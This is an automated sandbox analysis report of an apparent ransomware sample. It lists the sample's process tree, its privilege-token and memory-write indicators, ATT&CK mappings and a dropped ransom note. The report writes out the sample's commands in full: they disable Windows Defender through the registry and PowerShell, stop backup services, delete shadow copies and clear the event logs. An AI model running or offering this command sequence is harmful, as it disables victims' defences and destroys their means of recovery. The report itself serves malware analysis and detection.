Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid Process Token: SeSecurityPrivilege 2256 wevtutil.exe Token: SeBackupPrivilege 2256 wevtutil.exe Token: SeSecurityPrivilege 1372 wevtutil.exe Token: SeBackupPrivilege 1372 wevtutil.exe Token: SeSecurityPrivilege 2124 wevtutil.exe Token: SeBackupPrivilege 2124 wevtutil.exe Token: SeIncreaseQuotaPrivilege 2308 wmic.exe Token: SeSecurityPrivilege 2308 wmic.exe Token: SeTakeOwnershipPrivilege 2308 wmic.exe Token: SeLoadDriverPrivilege 2308 wmic.exe Token: SeSystemProfilePrivilege 2308 wmic.exe Token: SeSystemtimePrivilege 2308 wmic.exe Token: SeProfSingleProcessPrivilege 2308 wmic.exe Token: SeIncBasePriorityPrivilege 2308 wmic.exe Token: SeCreatePagefilePrivilege 2308 wmic.exe Token: SeBackupPrivilege 2308 wmic.exe Token: SeRestorePrivilege 2308 wmic.exe Token: SeShutdownPrivilege 2308 wmic.exe Token: SeDebugPrivilege 2308 wmic.exe Token: SeSystemEnvironmentPrivilege 2308 wmic.exe Token: SeRemoteShutdownPrivilege 2308 wmic.exe Token: SeUndockPrivilege 2308 wmic.exe Token: SeManageVolumePrivilege 2308 wmic.exe Token: 33 2308 wmic.exe Token: 34 2308 wmic.exe Token: 35 2308 wmic.exe Token: SeIncreaseQuotaPrivilege 2292 wmic.exe Token: SeSecurityPrivilege 2292 wmic.exe Token: SeTakeOwnershipPrivilege 2292 wmic.exe Token: SeLoadDriverPrivilege 2292 wmic.exe Token: SeSystemProfilePrivilege 2292 wmic.exe Token: SeSystemtimePrivilege 2292 wmic.exe Token: SeProfSingleProcessPrivilege 2292 wmic.exe Token: SeIncBasePriorityPrivilege 2292 wmic.exe Token: SeCreatePagefilePrivilege 2292 wmic.exe Token: SeBackupPrivilege 2292 wmic.exe Token: SeRestorePrivilege 2292 wmic.exe Token: SeShutdownPrivilege 2292 wmic.exe Token: SeDebugPrivilege 2292 wmic.exe Token: SeSystemEnvironmentPrivilege 2292 wmic.exe Token: SeRemoteShutdownPrivilege 2292 wmic.exe Token: SeUndockPrivilege 2292 wmic.exe Token: SeManageVolumePrivilege 2292 wmic.exe Token: 33 2292 wmic.exe Token: 34 2292 wmic.exe Token: 35 2292 wmic.exe Token: SeIncreaseQuotaPrivilege 2292 wmic.exe Token: SeSecurityPrivilege 2292 wmic.exe Token: SeTakeOwnershipPrivilege 2292 wmic.exe Token: SeLoadDriverPrivilege 2292 wmic.exe Token: SeSystemProfilePrivilege 2292 wmic.exe Token: SeSystemtimePrivilege 2292 wmic.exe Token: SeProfSingleProcessPrivilege 2292 wmic.exe Token: SeIncBasePriorityPrivilege 2292 wmic.exe Token: SeCreatePagefilePrivilege 2292 wmic.exe Token: SeBackupPrivilege 2292 wmic.exe Token: SeRestorePrivilege 2292 wmic.exe Token: SeShutdownPrivilege 2292 wmic.exe Token: SeDebugPrivilege 2292 wmic.exe Token: SeSystemEnvironmentPrivilege 2292 wmic.exe Token: SeRemoteShutdownPrivilege 2292 wmic.exe Token: SeUndockPrivilege 2292 wmic.exe Token: SeManageVolumePrivilege 2292 wmic.exe Token: 33 2292 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid Process procid_target PID 2872 wrote to memory of 2712 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 31 PID 2872 wrote to memory of 2712 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 31 PID 2872 wrote to memory of 2712 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 31 PID 2872 wrote to memory of 2712 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 31 PID 2712 wrote to memory of 2740 2712 net.exe 33 PID 2712 wrote to memory of 2740 2712 net.exe 33 PID 2712 wrote to memory of 2740 2712 net.exe 33 PID 2712 wrote to memory of 2740 2712 net.exe 33 PID 2872 wrote to memory of 2896 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 34 PID 2872 wrote to memory of 2896 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 34 PID 2872 wrote to memory of 2896 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 34 PID 2872 wrote to memory of 2896 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 34 PID 2896 wrote to memory of 2632 2896 net.exe 36 PID 2896 wrote to memory of 2632 2896 net.exe 36 PID 2896 wrote to memory of 2632 2896 net.exe 36 PID 2896 wrote to memory of 2632 2896 net.exe 36 PID 2872 wrote to memory of 2888 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 37 PID 2872 wrote to memory of 2888 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 37 PID 2872 wrote to memory of 2888 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 37 PID 2872 wrote to memory of 2888 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 37 PID 2888 wrote to memory of 2884 2888 net.exe 39 PID 2888 wrote to memory of 2884 2888 net.exe 39 PID 2888 wrote to memory of 2884 2888 net.exe 39 PID 2888 wrote to memory of 2884 2888 net.exe 39 PID 2872 wrote to memory of 2668 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 40 PID 2872 wrote to memory of 2668 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 40 PID 2872 wrote to memory of 2668 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 40 PID 2872 wrote to memory of 2668 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 40 PID 2668 wrote to memory of 2764 2668 net.exe 42 PID 2668 wrote to memory of 2764 2668 net.exe 42 PID 2668 wrote to memory of 2764 2668 net.exe 42 PID 2668 wrote to memory of 2764 2668 net.exe 42 PID 2872 wrote to memory of 2536 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 43 PID 2872 wrote to memory of 2536 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 43 PID 2872 wrote to memory of 2536 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 43 PID 2872 wrote to memory of 2536 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 43 PID 2536 wrote to memory of 2724 2536 net.exe 45 PID 2536 wrote to memory of 2724 2536 net.exe 45 PID 2536 wrote to memory of 2724 2536 net.exe 45 PID 2536 wrote to memory of 2724 2536 net.exe 45 PID 2872 wrote to memory of 2748 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 46 PID 2872 wrote to memory of 2748 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 46 PID 2872 wrote to memory of 2748 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 46 PID 2872 wrote to memory of 2748 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 46 PID 2748 wrote to memory of 2556 2748 net.exe 48 PID 2748 wrote to memory of 2556 2748 net.exe 48 PID 2748 wrote to memory of 2556 2748 net.exe 48 PID 2748 wrote to memory of 2556 2748 net.exe 48 PID 2872 wrote to memory of 2008 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 49 PID 2872 wrote to memory of 2008 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 49 PID 2872 wrote to memory of 2008 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 49 PID 2872 wrote to memory of 2008 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 49 PID 2008 wrote to memory of 2508 2008 net.exe 51 PID 2008 wrote to memory of 2508 2008 net.exe 51 PID 2008 wrote to memory of 2508 2008 net.exe 51 PID 2008 wrote to memory of 2508 2008 net.exe 51 PID 2872 wrote to memory of 2504 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 52 PID 2872 wrote to memory of 2504 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 52 PID 2872 wrote to memory of 2504 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 52 PID 2872 wrote to memory of 2504 2872 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe 52 PID 2504 wrote to memory of 2572 2504 net.exe 54 PID 2504 wrote to memory of 2572 2504 net.exe 54 PID 2504 wrote to memory of 2572 2504 net.exe 54 PID 2504 wrote to memory of 2572 2504 net.exe 54 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe"C:\Users\Admin\AppData\Local\Temp\80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\SysWOW64\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:2740
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵
- System Location Discovery: System Language Discovery
PID:2632
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵
- System Location Discovery: System Language Discovery
PID:2884
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵
- System Location Discovery: System Language Discovery
PID:2764
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵
- System Location Discovery: System Language Discovery
PID:2724
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵
- System Location Discovery: System Language Discovery
PID:2556
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵
- System Location Discovery: System Language Discovery
PID:2508
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵
- System Location Discovery: System Language Discovery
PID:2572
-
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2584
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2968
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2228
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1744
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2684
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2820
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2808
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2864
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1532
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1500
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:676
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:1908
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:1740
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1776
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1152
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1808
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:844
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:892
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2196
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2068
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:3052
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:2900
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:2140
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:1420
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:1332
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1624
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:616
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2472
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:860
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:564
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:688
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1920
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1360
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:736
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2328
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:1948
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2212
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1792
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵
- System Location Discovery: System Language Discovery
PID:2208 -
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2696
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵
- System Location Discovery: System Language Discovery
PID:2740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2632
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- System Location Discovery: System Language Discovery
PID:2824 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2672
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Impair Defenses
3Disable or Modify Tools
1Indicator Removal
3Clear Windows Event Logs
1File Deletion
2Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\wFLb_HOW_TO_DECRYPT.txt
Filesize1KB
MD51ca4bccdc072b810cb3f0080d616317a
SHA180dea435c073d9b0a2a54a853df4dc058ebd3352
SHA25648f9f649dfdf74a453d0229070bfdadd27c93e014f56cf36992758b70350e169
SHA512fcacc4812f6cd93cb91a5e502fe3571eefba692defdd52f67b55cad3790405535ff156ba87360dcccd86e0766e03ddbd6a1c547b7cd40d1f32ccf7e51dfc4488
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD561861f0e0667e446a10691b0822086fd
SHA14c7d4f455badf90e5e0e2d003f0197463615416a
SHA2567c34540426c560ba8728733fce18a99c5c1fc5bc08a902fcd1f9105a37afa326
SHA5129353b4351415245cc6008da702bc8065f485f6926320ce550b46d54f8074ce38cfbb2cd88aece9b0b2248143f7de582c7588afee2b9f5d9717feb807d2c35394